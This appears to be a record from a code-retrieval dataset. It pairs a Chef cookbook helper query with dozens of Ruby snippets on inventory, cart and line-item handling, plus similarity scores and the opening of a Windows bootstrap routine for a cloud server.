"def remove_lineitem\n line_item = @sale.line_items.find_by_id(params[:line_item])\n respond_to do |format|\n if line_item.present?\n line_item.item.stock_amount = line_item.item.stock_amount + line_item.quantity\n line_item.item.save\n line_item.destroy\n end\n update_totals\n\n format.js { ajax_refresh }\n end\n end",
"def checkout_cart\n self.line_items.each do |li|\n li.item.inventory -= li.quantity\n li.item.save\n end\n self.line_items.clear\n self.status = \"submitted\"\n self.user.current_cart_id = nil\n self.user.save\n end",
"def destroy\n @line_item = LineItem.find(params[:id])\n product = Product.find_by_id(@line_item.product.id)\n product.update_attributes(:remaining_quantity => (product.remaining_quantity + @line_item.quantity))\n @line_item.destroy\n\n respond_to do |format|\n format.html { redirect_to(orders_path) }\n format.json { head :ok }\n end\n end",
"def decline_refund\n response = JSON.parse(@client.patch(\"items/#{send(:id)}/decline_refund\").body)\n @attributes = response['items']\n true\n end",
"def deduct_quantity\n line_items.each do |i|\n i.product.current_stock -= i.quantity\n i.product.save\n end\n end",
"def reclaim!(distribution)\n ActiveRecord::Base.transaction do\n distribution.line_items.each do |line_item|\n inventory_item = self.inventory_items.find_by(item: line_item.item)\n inventory_item.update_attribute(:quantity, inventory_item.quantity + line_item.quantity)\n end\n end\n distribution.destroy\n end",
"def single_sell_in_day_remover(item)\r\n item.sell_in -= 1\r\n end",
"def release_quantity_of_item(item, quantity)\r\n if self.items.include?(item)\r\n item.quantity -= quantity\r\n end\r\n end",
"def issue_refer_line_items\n line_items.each do |line|\n logger.debug \"==@@@@==SalesOrder refer_line_id== #{line.refer_line_id}\"\n po_line = LineItem.find(line.refer_line_id)\n po_line.update_attribute(:quantity_issued, po_line.quantity_issued + line.quantity)\n\n line.update_attribute(:cart_id, nil)\n end\n end",
"def unequip_item\n\t\tself.equiped = false\n\t\tself.save\n\tend",
"def withdraw exit_date, estimated_return_date, pickup_company, pickup_company_contact, additional_comments, quantity, folio\n \n return self.status if cannot_withdraw?\n\n if quantity != '' and quantity < self.quantity.to_i\n self.quantity = self.quantity.to_i - quantity\n quantity_withdrawn = quantity\n else\n self.status = InventoryItem::OUT_OF_STOCK\n quantity_withdrawn = self.quantity\n self.quantity = 0\n end\n \n if self.save\n inventory_item = InventoryItem.where( 'actable_id = ? AND actable_type = ?', self.id, 'BulkItem' ).first\n if self.warehouse_locations?\n quantity_left = quantity\n if quantity != '' and quantity < ( self.quantity.to_i + quantity_withdrawn.to_i )\n item_location = self.item_locations.where( 'quantity >= ?', quantity ).first\n location = item_location.warehouse_location\n location.remove_quantity( inventory_item.id, quantity )\n elsif quantity != ''\n while quantity_left > 0\n item_location = self.item_locations.first\n location = item_location.warehouse_location\n if quantity_left >= item_location.quantity \n current_location_quantity = item_location.quantity \n location.remove_item( inventory_item.id )\n self.item_locations.delete( item_location )\n location.update_status\n else\n location.remove_quantity( inventory_item.id, quantity_left )\n end\n quantity_left = quantity_left - current_location_quantity\n end\n else\n item_location = self.item_locations.first\n location = item_location.warehouse_location\n location.remove_item( inventory_item.id )\n self.item_locations.delete( item_location )\n location.update_status\n end\n end\n CheckOutTransaction.create( :inventory_item_id => inventory_item.id, :concept => 'Salida granel', :additional_comments => additional_comments, :exit_date => exit_date, :estimated_return_date => estimated_return_date, :pickup_company => pickup_company, :pickup_company_contact => pickup_company_contact, :quantity => quantity_withdrawn, :folio => folio )\n return true\n end\n\n return false\n end",
"def refund!\n response = credit_card.credit!(total_amount_in_cents, payment.authorization)\n self.response = response\n self.description = response.message\n self.authorization = response.authorization\n if response.success?\n invoice.update_attribute(:status, \"closed\")\n self.status = \"cleared\"\n self.save!\n return true\n else\n self.status = \"failed\"\n for item in self.line_items\n item.amount = 0\n end\n self.save!\n return false\n end\n end",
"def mark_monthlyinvitems_for_removal \n monthlyinvitems.each do |monthlyinvitem|\n monthlyinvitem.mark_for_destruction if monthlyinvitem.qty.to_f == 0.0\n end \n end",
"def remove\n if @item.quantity == 1\n @item.destroy!\n else\n @item.decrement(:quantity)\n @item.save!\n end\n\n refresh\n end",
"def remove_items_from_cart\n line_items.each { |i| i.cart = nil }\n end",
"def use_item(item_name:, quantity:)\n total_items_quantity[item_name] -= quantity\n end",
"def sell_inventory(material, quantity)\n material.quantity -= quantity\n end",
"def remove_line_item(line_item)\n unless self.ordered?\n line_item.destroy\n end\n end",
"def remove_item\n\t\tset_sale\n\t\tpopulate_products\n\n\t\tline_item = Item.where(sale_id: params[:sale_id], product_id: params[:product_id]).first\n\t\tline_item.quantity -= 1\n\n\t\tif line_item.quantity == 0\n\t\t\tline_item.destroy\n\t\telse\n\t\t\tline_item.save\n\t\t\tupdate_line_item_totals(line_item)\n\t\tend\n\n\t\t# Llama método que devuelve cantidad al stock\n\t\treturn_item_to_stock(params[:product_id])\n\n\t\tupdate_totals\n\n\t\trespond_to do |format|\n\t\t\tformat.js { ajax_refresh }\n\t\tend\n\tend",
"def destroy_or_save(line_item, line_item_quantity)\n line_item_quantity.zero? ? line_item.destroy! : line_item.save!\n end",
"def uncomplete(item)\n args = {id: item.id}\n return @client.api_helper.command(args, \"item_uncomplete\")\n end",
"def unequip(item)\n return {:status => \"Item not equipped\"} unless item.equipped?\n\n perform(0) do |notifications|\n item.unequip!\n notifications[:status] = \"Unequipped #{item}\"\n end\n end",
"def reserve_inventory!(order_quantity)\n self.quantity -= order_quantity\n save!\n end",
"def decrease_sell_in(item)\n item.sell_in -= 1\n end",
"def item_inventory_update\n \n item = Item.find(params[:item_id])\n order= Order.find(params[:id])\n item_order = ItemOrder.where(item_id: item.id, order_id: order.id).first\n new_inventory = item.inventory - item_order.quantity\n item_order.update(status: \"fulfilled\")\n item.update(inventory: new_inventory)\n end",
"def flunk(workitem, err_class_or_instance, *err_arguments)\n\n r = remove_workitem('reject', workitem)\n\n return flunk(workitem) if r != nil\n\n workitem.h.delete('_rev')\n\n super(workitem, err_class_or_instance, *err_arguments)\n end",
"def rollback_item\n ingreso_producto = self.ingreso_producto\n ingreso_producto.cantidad = ingreso_producto.cantidad + self.cantidad\n ingreso_producto.producto.stock = ingreso_producto.producto.stock + self.cantidad #suma al stock si se anula\n Lineakardex.create(:kardex => ingreso_producto.producto.kardex, :tipo => \"Entrada\", :fecha => Time.now, :cantidad => self.cantidad, :v_unitario => self.ingreso_producto.producto.precio_venta, :modulo => \"Hospitalizacion\", :observaciones => \"Pedido Anulado\" )\n ingreso_producto.save\n ingreso_producto.producto.save\n end",
"def update_cart_line_item(a_line_item, quantity, options={})\n return remove(a_line_item, options) if quantity <= 0\n item = find(:first, a_line_item)\n item.quantity = quantity if item\n item\n end",
"def destroy\n\n if params[:product_id] then\n# TODO need to use @cart.id to ensure only this users line_item is accessed.\n current_item = LineItem.find_by_product_id(params[:product_id] )\n else\n current_item = LineItem.find(params[:id])\n end\n\n if current_item\n current_item.quantity -= 1\n puts current_item.quantity\n if current_item.quantity <= 0\n current_item.destroy\n else\n current_item.save\n end\n else\n current_item.destroy\n end\n\n respond_to do |format|\n format.html { redirect_to store_url }\n format.json { head :no_content }\n end\n end",
"def decrement_inventory!\n self.available_inventory = self.available_inventory - 1\n self.save\n end",
"def toggle_down_inventory\n self.available_inventory -= 1\n self.save\n\n return self.available_inventory\n end",
"def lose_item(item, n, include_equip = false)\n gain_item(item, -n, include_equip)\n end",
"def destroy\n @line_item.destroy\n destroy_line_item_response\n end",
"def remove!(donation_or_purchase)\n log = {}\n donation_or_purchase.line_items.each do |line_item|\n inventory_item = InventoryItem.find_by(storage_location: id, item_id: line_item.item_id)\n if (inventory_item.quantity - line_item.quantity) <= 0\n inventory_item.destroy\n else\n inventory_item.update(quantity: inventory_item.quantity - line_item.quantity)\n end\n log[line_item.item_id] = \"-#{line_item.quantity}\"\n end\n log\n end",
"def return_item\n items = self.see_purchases.map do |merchandise|\n {name: merchandise.name, merch_id: merchandise.id}\n end\n merch = TTY::Prompt.new.select(\"Here is a list of your purchases. What would you like to return?\",items)\n purchase = self.specific_purchase(merch)\n purchase.destroy \n puts \"your item has been refunded!\"\n restock = self.select_merchandise(merch)\n restock.update(inventory: restock.inventory + 1)\n end",
"def reset_item(item, date: nil, finish_date: nil, resume: false)\n date ||= Time.now\n item.date = date\n if finish_date\n item.tag('done', remove: true)\n item.tag('done', value: finish_date.strftime('%F %R'))\n else\n item.tag('done', remove: true) if resume\n end\n logger.info('Reset:', %(Reset #{resume ? 'and resumed ' : ''} \"#{item.title}\" in #{item.section}))\n item\n end",
"def purge!\n unless self.ordered?\n self.line_items.each do |line_item|\n remove_line_item(line_item) if line_item.invalid?\n end\n end\n end",
"def remove_item(item, amount)\n # Check if the Entity already has that item\n # in the inventory. If so, just decrease\n # the amount.\n @inventory.each_with_index do |couple, index|\n if (couple.first == item)\n couple.second -= amount\n if (couple.second <= 0)\n @inventory.delete_at(index)\n end\n return\n end\n end\n end",
"def deduct(line_item_units)\n\t\tself.units_on_hand = self.units_on_hand - line_item_units \n\t\t# self.units_on_hand =- line_item_units <- means the same thing =- is shorthand\n\t\tself.save!\n\tend",
"def intend(item)\n return unless item\n intended.remove_class(:intended) if intended\n item.add_class(:intended)\n end",
"def intend(item)\n return unless item\n intended.remove_class(:intended) if intended\n item.add_class(:intended)\n end",
"def issue_unissue_po_line_items_when_so_and_cart_diffs(issue_cart)\n logger.debug \"==@@@@==SalesOrder: issue unissue(), issuce_cart.id==== #{issue_cart.id}\"\n # so line_items not in cart(will be removed), issueback po\n self.line_items.each do |so_line|\n if not issue_cart.line_items.where(line_number: so_line.line_number).exists?\n logger.debug \"==@@@@==line_items to be removed from so==== #{so_line.id}\"\n self.issue_back_refer_line_item(so_line, so_line.quantity)\n end\n end\n\n # cart line_items not in so(will be added), issue po\n issue_cart.line_items.each do |line_item|\n # cart line_items not in so: to be added to so\n if not self.line_items.where(line_number: line_item.line_number).exists?\n logger.debug \"==@@@@==new line, to be added to so==== #{line_item.id}\" \n self.issue_refer_line_item(line_item, line_item.quantity) \n else # exist, but quantity different\n line = self.line_items.where(line_number: line_item.line_number).take\n logger.debug \"==@@@@==exsit line, update po==== #{line_item.id}\"\n if line.quantity < line_item.quantity\n self.issue_refer_line_item(line_item, line_item.quantity - line.quantity)\n elsif line.quantity > line_item.quantity\n self.issue_back_refer_line_item(line_item, line.quantity - line_item.quantity) \n end\n end\n end\n end",
"def down_item\n order_op2(false, @item)\n end",
"def use_item(item, entity)\n index = has_item(item)\n if index\n actual_item = inventory[index].first\n actual_item.use(self, entity)\n remove_item(actual_item) if actual_item.consumable\n else\n print NO_SUCH_ITEM_ERROR\n end\n end",
"def decrement_product_inventory_count!\n self.decrement!(:inventory_count, 1)\n end",
"def cancel!\n self.update_attributes(status: CANCELLED)\n #self.line_items.update_attributes(status: LineItem::CANCELLED)\n end",
"def remove_item\n\n end",
"def void_last_transaction\n transaction = @transactions.pop\n self.total -= (transaction.price * transaction.quantity)\n transaction.quantity.times{self.items.delete(transaction.item_name)}\n end",
"def remove_item\n product = Product.find_by_cs_sku(params[:sku])\n item = ReservedItem.find_by_sql(['SELECT qty FROM reserved_items where user_id = ? and product_id = ? and session_id = ?',\n current_user.id,\n product.id,\n session.id]).first\n unless item.nil?\n product.update_attribute(:qty, product.qty + item.qty)\n ReservedItem.delete_all(['user_id = ? and product_id = ? and session_id = ?', current_user.id,\n product.id,\n session.id])\n end\n\n respond_with_format { @cart.remove_item params[:sku] }\n end",
"def destroy\n\t\t@line_item.destroy\n\n\t\trespond_to do |format|\n\t\t\tformat.html { redirect_to line_items_url, notice: \"Req ID: #{@line_item.id} removed.\" }\n\t\t\tformat.json { head :no_content }\n\t\tend\n\tend",
"def remove_item(item)\n order_item = self.order_items.where(item: item).order('price asc').first\n if order_item.is_a? OrderItem\n order_item.remove 1\n recalculate!\n end\n end",
"def toggle_faulty\n @item.toggle!(:faulty)\n end",
"def void_last_transaction\n #binding.pry\n @total -= @last_price * @last_quantity\n @last_quantity.times do\n @items.pop\n end\n\n end",
"def destroy_booking_line(item_id)\n\n product_lines = self.booking_lines.select do |booking_line|\n booking_line.item_id == item_id\n end\n\n if booking_line = product_lines.first\n transaction do\n self.item_cost -= booking_line.item_cost\n self.product_deposit_cost -= booking_line.product_deposit_cost\n self.category_supplement_1_cost -= booking_line.category_supplement_1_cost\n self.category_supplement_2_cost -= booking_line.category_supplement_2_cost\n self.category_supplement_3_cost -= booking_line.category_supplement_3_cost \n self.calculate_cost(false, false)\n self.save\n booking_line.destroy\n # Create newsfeed\n ::Yito::Model::Newsfeed::Newsfeed.create(category: 'booking',\n action: 'destroy_booking_line',\n identifier: self.id.to_s,\n description: BookingDataSystem.r18n.t.booking_news_feed.destroyed_booking_line(item_id),\n attributes_updated: {item_id: item_id}.merge({booking: newsfeed_summary}).to_json)\n end\n self.reload\n end\n\n end",
"def remove_item(item_to_remove)\r\n self.credits = self.credits + item_to_remove.get_price\r\n self.item_list.delete(item_to_remove)\r\n end",
"def remove_item(item_to_remove)\r\n self.credits = self.credits + item_to_remove.get_price\r\n self.item_list.delete(item_to_remove)\r\n end",
"def offer_an_item(item)\r\n item.status = true\r\n end",
"def unpaid_line_items\n @unpaid_line_items ||= line_items.find_all_by_paid(false)\n end",
"def restore\n @item = @collection.items.get(params[:item_id])\n old_item = @item.versions.first(:deleted_at => params[:deleted_at])\n att = old_item.attributes\n att.delete(:deleted_at)\n att.delete(:original_uid)\n att.delete(:id)\n if @item.update(att)\n flash[:notice] = \"Item Restored Successfully!\"\n redirect_to project_collection_item_path(@project, @collection, @item)\n else\n flash[:error] = \"Item failed to restore!\"\n render :show\n end\n end",
"def reduce_inventory\n begin\n if @product_available_stock.update_attribute(:items_count,\n @product_available_stock.items_count -\n inventory_stock_params[:items_count])\n response = {message: 'Inventory has been reduced of particular product stock of in specified distribution center.'}\n status_code = 200\n else\n response = {errors:\n [{detail: \"We can't apply this operation at this time, please try later.\"}]}\n status_code = 403\n end\n rescue => ex\n response = {errors: [{detail: ex.message}]}\n status_code = 403\n end\n render json: response, status: status_code\n end",
"def rl_maybe_unsave_line()\r\n if (@_rl_saved_line_for_history)\r\n # Can't call with `1' because rl_undo_list might point to an undo\r\n # list from a history entry, as in rl_replace_from_history() below.\r\n rl_replace_line(@_rl_saved_line_for_history.line, false)\r\n @rl_undo_list = @_rl_saved_line_for_history.data\r\n @_rl_saved_line_for_history = nil\r\n @rl_point = @rl_end # rl_replace_line sets rl_end\r\n else\r\n rl_ding()\r\n end\r\n 0\r\n end",
"def reset\n @item_ids = []\n end",
"def remove_quantity(inventory_item_id, quantity, concept = 3)\n item_location = ItemLocation.find_by(\n inventory_item_id: inventory_item_id,\n warehouse_location_id: id\n )\n\n return NOT_ENOUGH_STOCKS if quantity > item_location.quantity\n\n item_location.quantity -= quantity\n quantity = item_location.quantity if item_location.quantity.negative?\n\n item_location.save\n WarehouseTransaction.create(\n inventory_item_id: inventory_item_id,\n warehouse_location_id: id,\n quantity: quantity,\n concept: concept\n )\n\n if item_location.quantity <= 0\n item_location.destroy\n return 0\n end\n update_status\n item_location.quantity\n end",
"def rl_revert_line(count, key)\r\n if @rl_undo_list.nil?\r\n rl_ding()\r\n else\r\n while (@rl_undo_list)\r\n rl_do_undo()\r\n end\r\n if (@rl_editing_mode == @vi_mode)\r\n @rl_point = @rl_mark = 0 # rl_end should be set correctly\r\n end\r\n end\r\n 0\r\n end",
"def remove_last_item_from_items_collected_at_desk\n $items_collected.delete($items_collected.last)\n# returns user to previous task of choosing item from desk\n desk_options\nend",
"def lose_item(item, amount, include_equip = false, opp = Vocab::Coinbase, info = '', display = true)\n gain_item(item, -amount, true, opp, info, display) if include_equip\n gain_item(item, -amount, false, opp, info, display) if !include_equip\n end",
"def reset_item(value = nil, **opt)\n set_item(value, **opt).presence\n end",
"def test_should_remove_first_line_item_from_invoice\r\n assert_no_difference 'Invoice.count' do\r\n assert_difference 'LineItem.count', -1 do\r\n @basic_user.edits_invoice(invoices(:invoice_with_line_items).id)\r\n \r\n #get first row in the table.\r\n trows = @basic_user.line_items_rows\r\n assert_equal 2, trows.length\r\n tr1 = trows[::WatirBrowser.item_index(1)]\r\n assert tr1.exists?\r\n @basic_user.populate(tr1.text_field(:name, \"invoice[line_items_attributes][][description]\"),\"Removed Description one\")\r\n\r\n #remove the first line item\r\n tr1.link(:name, 'remove').click\r\n\r\n @basic_user.submits\r\n end\r\n end\r\n \r\n invoice = Invoice.find(invoices(:invoice_with_line_items).id)\r\n assert_equal 1, invoice.line_items.count\r\n assert_equal line_items(:line_item_two).description, invoice.line_items[0].description\r\n end",
"def test_should_remove_second_line_item_from_invoice\r\n assert_no_difference 'Invoice.count' do\r\n assert_difference 'LineItem.count', -1 do\r\n @basic_user.edits_invoice(invoices(:invoice_with_line_items).id)\r\n \r\n #get first row in the table.\r\n trows = @basic_user.line_items_rows\r\n assert_equal 2, trows.length\r\n tr2 = trows[::WatirBrowser.item_index(2)]\r\n assert tr2.exists?\r\n @basic_user.populate(tr2.text_field(:name, \"invoice[line_items_attributes][][description]\"),\"Removed Description two\")\r\n\r\n #remove the second line item\r\n tr2.link(:name, 'remove').click\r\n\r\n @basic_user.submits\r\n end\r\n end\r\n \r\n invoice = Invoice.find(invoices(:invoice_with_line_items).id)\r\n assert_equal 1, invoice.line_items.count\r\n assert_equal line_items(:line_item_one).description, invoice.line_items[0].description \r\n \r\n end",
"def remove_item_verify\n\n\t\twait_for_animate\n\t\tvalue3= query(\"* marked:'quantityText'\", :text)[0]\n\t\tguide_price3 = query(\"* marked:'basket_action_bar_up'\", :text)[0]\n\t\tputs \"Quantity Before remove Item : : #{value3}\"\n\t\ttouch(\"* id:'remove_btn'\")\n\t\twait_for_animate\n\t\tsleep 4\n\t\t#wait_for_elements_exist( [\"button marked:'Open basket'\"], :timeout => 40)\n\t\tvalue4 = query(\"* marked:'quantityText'\", :text)[0]\n\t\tguide_price4 = query(\"* marked:'basket_action_bar_up'\", :text)[0]\n\t\tputs \"Values guide price & Quantity(remove :After) : #{guide_price4} #{value4}\"\n\t\tputs \"Count guide price #{guide_price4}\"\n\t\tputs \"Quantity campare\"\n\t\tcampare_values(value3, value4)\n\t\t# puts \"guideprice campare\"\n\t\t# campare_values(guide_price3,guide_price4)\n\t\t#puts \"Item added successfully\"\n\tend",
"def remove_item(item)\n if !@item\n log(\"Nothing is equipped in that EquipSlot.\")\n return\n end\n if @item != item\n log(\"Item being removed from EquipSlot is not the same as already equipped item.\")\n return\n end\n @item = nil if @item == item\n return\n end",
"def delete_all_line_items_for_inventory_item_id inventory_item_id\n line_items.destroy(line_items.select{|li| (!li.inventory_item.nil? && li.inventory_item.id == inventory_item_id)})\n end",
"def test_order_line_item_quantity_is_postive\n a_towel = items(:towel)\n an_order_line_item = OrderLineItem.for_product(a_towel)\n an_order_line_item.quantity = -1;\n assert_raise(ActiveRecord::RecordInvalid) { \n an_order_line_item.save!\n }\n an_order_line_item.quantity = 0\n assert_raise(ActiveRecord::RecordInvalid) {\n an_order_line_item.save!\n }\n an_order_line_item.quantity = 1\n assert_nothing_raised {\n an_order_line_item.save!\n }\n end",
"def change_inventory_items_for_vendor vendor_id, inventory_item_ids\n\n # Remove all menu items where we are dealing with this vendor, but leave the fee, if any\n line_items.destroy(line_items.select{|li| (!li.inventory_item.nil? && li.inventory_item.vendor_id == vendor_id)})\n\n inventory_item_ids.each do |id|\n line_items.push(create_line_item_from_inventory_item(InventoryItem.find(id), 0, Vendor.find(vendor_id), account, false, false, \"\"))\n end\n\n trigger_event_rollup\n\n end",
"def clearance_items!\n return if @batch_ids.empty?\n @batch.save!\n @batch_ids.each do |item_id|\n item = Item.find(item_id)\n item.clearance!\n # NOTE: Considered adding a catch here if the item fails to save.\n # Feels unneeded as the item cannot possibly have invalid state at this point.\n @batch.items << item\n @notices << \"Item #{item_id} Clearanced Successfully!\"\n end\n end",
"def void_last_transaction\n @items.slice!(@items.length-@last_qty, @items.length)\n @total -= @last_transaction.values[0]\n end",
"def consume_item(item)\n if item.is_a?(RPG::Item) and item.consumable\n lose_item(item, 1)\n end\n end",
"def clear_line_items\n @line_items = []\n end",
"def move_inventory!(transfer)\n updated_quantities = {}\n item_validator = Errors::InsufficientAllotment.new(\"Transfer items exceeds the available inventory\")\n transfer.line_items.each do |line_item|\n inventory_item = self.inventory_items.find_by(item: line_item.item)\n new_inventory_item = transfer.to.inventory_items.find_or_create_by(item: line_item.item)\n next if inventory_item.nil? || inventory_item.quantity == 0\n if inventory_item.quantity >= line_item.quantity\n updated_quantities[inventory_item.id] = (updated_quantities[inventory_item.id] || inventory_item.quantity) - line_item.quantity\n updated_quantities[new_inventory_item.id] = (updated_quantities[new_inventory_item.id] ||\n new_inventory_item.quantity) + line_item.quantity\n else\n item_validator.add_insufficiency(line_item.item, inventory_item.quantity, line_item.quantity)\n end\n end\n \n raise item_validator unless item_validator.satisfied?\n\n update_inventory_inventory_items(updated_quantities)\n end",
"def adjust!(adjustment)\n updated_quantities = {}\n item_validator = Errors::InsufficientAllotment.new(\"Adjustment exceeds the available inventory\")\n\n adjustment.line_items.each do |line_item|\n\n inventory_item = self.inventory_items.find_by(item: line_item.item)\n next if inventory_item.nil? || inventory_item.quantity == 0\n\n if ((inventory_item.quantity + line_item.quantity) >= 0)\n updated_quantities[inventory_item.id] = (updated_quantities[inventory_item.id] || inventory_item.quantity) + line_item.quantity\n else\n item_validator.add_insufficiency(line_item.item, inventory_item.quantity, line_item.quantity)\n end\n\n end\n\n raise item_validator unless item_validator.satisfied?\n\n update_inventory_inventory_items(updated_quantities)\n end",
"def set_sellable_item_state(state_result)\n if !state_result[:inventory_item].nil?\n if (state_result[:inventory_item].quantity > state_result[:inventory_item].item.quantity_threshold)\n state_result[:inventory_item].update(id: state_result[:inventory_item].id, inventory_item_state: InventoryItemState.find_by(name: \"Available\"))\n elsif (state_result[:inventory_item].quantity == 0)\n state_result[:inventory_item].update(id: state_result[:inventory_item].id, inventory_item_state: InventoryItemState.find_by(name: \"Out_of_Stock\"), inventory_item_condition: InventoryItemCondition.find_by(name: \"Not_Sellable\"))\n else\n state_result[:inventory_item].update(id: state_result[:inventory_item].id, inventory_item_state: InventoryItemState.find_by(name: \"CriticaL_Level\"))\n end\n end\n end",
"def remove\n\t\t# se o usuário não entiver infectado e já existir o inventário salvo, remove a quantidade no inventário\n\t\tunless User.healthy? inventory_params[:user_id]\n \t \trender json: { error: \"Denied access. User is contaminated!\" }, status: 403 and return\n\t\tend\n\n\t\tif @inventory.remove(inventory_params[:amount].to_i)\n\t\t\trender json: @inventory, status: 200\n\t\telse\n\t\t\trender json: @inventory.errors, status: :unprocessable_entity\n\t\tend\n\tend",
"def item_effect_miss\r\n self.damage = 'Miss'\r\n end",
"def approve!\n inventory.restock!(self, Time.current, inventory_check)\n update!(adjustment: difference)\n end",
"def remove_item(user, item)\n before = get_item_count\n self.items.delete(item)\n after = get_item_count\n (before-after-1).times do\n user.add_to_list(item)\n end\n end",
"def decline\n order = current_user.restaurant.orders.find(params[:id])\n order.update(status: 2)\n render json: {is_success: true}, status: :ok\n end",
"def delete_all_line_items_for_inventory_item_id inventory_item_id\n destroy_line_items(line_items.select{|li| (!li.inventory_item.nil? && li.inventory_item.id == inventory_item_id)})\n end",
"def erasure_record\n ax_order_line_items.destroy_all unless ax_order_line_items.blank?\n self.update_attributes(\n :ax_account_id => \"\",\n :ax_account_number => \"\",\n :delivery_city => \"\",\n :delivery_country_region_id => \"\",\n :delivery_county => \"\",\n :delivery_date => \"\",\n :delivery_state => \"\",\n :delivery_street => \"\",\n :delivery_zip_code => \"\",\n :purch_order_form_num => \"\",\n :sales_tax => 0.0,\n :shipping_charges => 0.0,\n :discounts => 0.0,\n :sales_status => \"\",\n :status => \"ERASURED\"\n )\n end",
"def destroy\n @line_item = @current_cart.line_items.where(:id => params[:id]).first\n unless @line_item.nil?\n @line_item.destroy\n end\n end",
"def process_item(item_id)\n @item_id = item_id.to_i\n @batch_ids << @item_id unless precheck_clearancing_error\n end",
"def change_item_state(checklist, item)\n id = item.id\n pos = item.pos\n # checked = item.state_was == \"complete\" ? true : false\n name = item.name\n checklist.delete_checklist_item(id)\n checklist.add_item(name, true, pos)\n checklist.save\nend"
] | [
"0.6766502",
"0.6419233",
"0.6412429",
"0.63957113",
"0.6360755",
"0.63582975",
"0.6263182",
"0.6224137",
"0.6224137",
"0.6195032",
"0.61344975",
"0.6108307",
"0.60007876",
"0.59919155",
"0.59865284",
"0.5963751",
"0.59574777",
"0.5936173",
"0.5917403",
"0.59152454",
"0.5883776",
"0.5852342",
"0.5852244",
"0.5851688",
"0.58293056",
"0.5823706",
"0.58211774",
"0.57900196",
"0.57875526",
"0.5756652",
"0.5717471",
"0.57170516",
"0.5709641",
"0.570885",
"0.5700656",
"0.5694606",
"0.56908053",
"0.56829214",
"0.56686455",
"0.5661349",
"0.56586903",
"0.56376386",
"0.56335866",
"0.56252366",
"0.5610645",
"0.5600268",
"0.5595381",
"0.5591146",
"0.5585776",
"0.5585776",
"0.55711204",
"0.5569774",
"0.55697334",
"0.5568788",
"0.55665517",
"0.5556423",
"0.55267006",
"0.550985",
"0.55075705",
"0.5500227",
"0.5493364",
"0.5491079",
"0.54903644",
"0.5469518",
"0.5469518",
"0.54631263",
"0.54602444",
"0.54506445",
"0.5436094",
"0.5433495",
"0.54330635",
"0.54288733",
"0.5424726",
"0.54235774",
"0.54085875",
"0.5405175",
"0.5398094",
"0.53898084",
"0.5380695",
"0.53781635",
"0.5365065",
"0.5361939",
"0.53580475",
"0.53559256",
"0.5355611",
"0.53527874",
"0.535237",
"0.53514844",
"0.5351122",
"0.53427714",
"0.53412855",
"0.5337084",
"0.5336788",
"0.53261495",
"0.53244185",
"0.5323523",
"0.5323334",
"0.53218234",
"0.5318314",
"0.53157437"
] | 0.6989728 | 0 |
Cookbook Name:: tieredchefserver Libraries:: helpers | def server_file(uri)
require 'pathname'
require 'uri'
Pathname.new(URI.parse(uri).path).basename.to_s
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def get_helper(node)\n Chef::RemoteRecipe.factory(node)\n end",
"def initialSSHTasks(ssh)\n win_env_fix = %q{echo 'export PATH=\"$PATH:/cygdrive/c/opscode/chef/embedded/bin\"' > \"$HOME/chef-client\"; echo 'prev_dir=\"`pwd`\"; for __dir in /proc/registry/HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control/Session\\ Manager/Environment;do cd \"$__dir\"; for __var in `ls * | grep -v TEMP | grep -v TMP`;do __var=`echo $__var | tr \"[a-z]\" \"[A-Z]\"`; test -z \"${!__var}\" && export $__var=\"`cat $__var`\" >/dev/null 2>&1; done; done; cd \"$prev_dir\"; /cygdrive/c/opscode/chef/bin/chef-client.bat $@' >> \"$HOME/chef-client\"; chmod 700 \"$HOME/chef-client\"; ( grep \"^alias chef-client=\" \"$HOME/.bashrc\" || echo 'alias chef-client=\"$HOME/chef-client\"' >> \"$HOME/.bashrc\" ) ; ( grep \"^alias mu-groom=\" \"$HOME/.bashrc\" || echo 'alias mu-groom=\"powershell -File \\\"c:/Program Files/Amazon/Ec2ConfigService/Scripts/UserScript.ps1\\\"\"' >> \"$HOME/.bashrc\" )}\n win_installer_check = %q{ls /proc/registry/HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Installer/}\n lnx_installer_check = %q{ps auxww | awk '{print $11}' | egrep '(/usr/bin/yum|apt-get|dpkg)'}\n lnx_updates_check = %q{( test -f /.mu-installer-ran-updates || ! test -d /var/lib/cloud/instance ) || echo \"userdata still running\"}\n win_set_pw = nil\n\n if windows? and !@config['use_cloud_provider_windows_password']\n # This covers both the case where we have a windows password passed from a vault and where we need to use a a random Windows Admin password generated by MU::Cloud::Server.generateWindowsPassword\n pw = @groomer.getSecret(\n vault: @config['mu_name'],\n item: \"windows_credentials\",\n field: \"password\"\n )\n win_check_for_pw = %Q{powershell -Command '& {Add-Type -AssemblyName System.DirectoryServices.AccountManagement; $Creds = (New-Object System.Management.Automation.PSCredential(\"#{@config[\"windows_admin_username\"]}\", (ConvertTo-SecureString \"#{pw}\" -AsPlainText -Force)));$DS = New-Object System.DirectoryServices.AccountManagement.PrincipalContext([System.DirectoryServices.AccountManagement.ContextType]::Machine); $DS.ValidateCredentials($Creds.GetNetworkCredential().UserName, $Creds.GetNetworkCredential().password); echo $Result}'}\n win_set_pw = %Q{powershell -Command \"& {(([adsi]('WinNT://./#{@config[\"windows_admin_username\"]}, user')).psbase.invoke('SetPassword', '#{pw}'))}\"}\n end\n\n # There shouldn't be a use case where a domain joined computer goes through initialSSHTasks. Removing Active Directory specific computer rename.\n set_hostname = true\n hostname = nil\n if !@config['active_directory'].nil?\n if @config['active_directory']['node_type'] == \"domain_controller\" && @config['active_directory']['domain_controller_hostname']\n hostname = @config['active_directory']['domain_controller_hostname']\n @mu_windows_name = hostname\n set_hostname = true\n else\n # Do we have an AD specific hostname?\n hostname = @mu_windows_name\n set_hostname = true\n end\n else\n hostname = @mu_windows_name\n end\n win_check_for_hostname = %Q{powershell -Command '& {hostname}'}\n win_set_hostname = %Q{powershell -Command \"& {Rename-Computer -NewName '#{hostname}' -Force -PassThru -Restart; Restart-Computer -Force }\"}\n\n begin\n # Set our admin password first, if we need to\n if windows? and !win_set_pw.nil? 
